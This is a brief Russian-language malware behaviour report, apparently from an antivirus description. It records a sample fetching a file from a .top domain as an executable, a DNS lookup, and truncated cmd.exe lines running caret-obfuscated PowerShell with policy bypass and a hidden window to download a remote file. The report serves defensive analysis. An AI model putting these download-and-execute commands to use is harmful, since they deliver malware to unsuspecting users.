Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^wer^sHELl^.^EX^e^ -E^XeCUTio^nPO^lic^y^ ^b^y^pAss ^-^nO^Pr^o^f^i^Le -^WI^N^DoWSt^YlE H^idDe^n (^New-O^BjEcT^ ^S^YS^T^E^M.n^ET.Web^cli^e^NT^).dO^wNL^Oa^d^FIlE('http://www.f...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "PO^wer^sHELl^.^EX^e^ -E^XeCUTio^nPO^lic^y^ ^b^y^pAss ^-^nO^Pr^o^f^i^Le -^WI^N^DoWSt^YlE H^idDe^n (^New-O^BjEcT^ ^S^YS^T^E^M.n^ET.Web^cli^e^NT^).dO^wNL^Oa^d^FIlE('http://www.f...' (со скрытым окном)